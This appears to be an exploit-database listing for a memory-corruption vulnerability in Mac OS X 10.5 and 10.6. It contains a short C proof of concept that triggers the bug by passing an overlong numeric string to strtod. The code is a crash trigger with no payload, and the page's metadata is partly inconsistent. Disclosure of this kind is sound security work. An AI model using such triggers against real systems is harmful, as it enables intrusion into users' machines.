header-logo
Suggest Exploit
vendor:
Mac OS X
by:
Unknown
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Mac OS X
Affected Version From: Mac OS X 10.5
Affected Version To: Mac OS X 10.6
Patch Exists: No
Related CWE: Unknown
CPE: o:apple:mac_os_x:10.5
Metasploit:
Other Scripts:
Platforms Tested: Mac OS X
Unknown

Memory Corruption Vulnerability in Mac OS X

The software fails to properly bounds-check data used as an array index, leading to a memory-corruption vulnerability. Attackers can exploit this vulnerability to execute arbitrary code within the context of affected applications.

Mitigation:

Apply the latest security updates and patches provided by the vendor.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/37687/info

Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.

Attackers may exploit this issue to execute arbitrary code within the context of affected applications.

Mac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. 

#include <stdio.h>
#include <stdlib.h>
int main ()
{
char number[] = "0.1111111111...11", *e;
double weed = strtod(number, &e);
printf("grams = %lf\n", weed);
return 0;
}